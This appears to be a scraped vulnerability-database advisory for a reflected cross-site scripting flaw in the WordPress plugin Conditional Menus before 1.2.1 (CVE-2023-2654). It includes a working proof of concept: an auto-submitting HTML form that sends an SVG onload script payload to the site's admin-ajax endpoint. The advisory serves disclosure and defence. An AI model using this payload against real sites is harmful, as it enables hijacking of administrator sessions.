Lucene search
WpvulndbWPEX-ID:506ECEE9-8E42-46DE-9C5C-FC252AB2646EHistoryMay 24, 2023 - 12:00 a.m.
Conditional Menus < 1.2.1 - Reflected XSS
2023-05-2400:00:00
wpvulndb
72
conditional menus
version 1.2.1
reflected xss
admin page
html code
form action
cross-site scripting
EPSS
0.001
Percentile
30.1%
The plugin does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open a page with the HTML code below
<html>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php?action=themify_cm_get_conditions" method="POST">
<input type="text" name="selected" value='"><svg/onload=alert(/XSS/)>'>
<input type="submit" value="submit">
</form>
</body>
</html>
Related
wpvulndb
wpvulndb
Conditional Menus < 1.2.1 - Reflected XSS
2023-05-24 00:00:00
cve
cve
CVE-2023-2654
2023-06-19 11:15:10
nvd
nvd
CVE-2023-2654
2023-06-19 11:15:10
prion
prion
Cross site scripting
2023-06-19 11:15:00
cvelist
cvelist
CVE-2023-2654 Conditional Menus < 1.2.1 - Reflected XSS
2023-06-19 10:52:53
wordfence
wordfence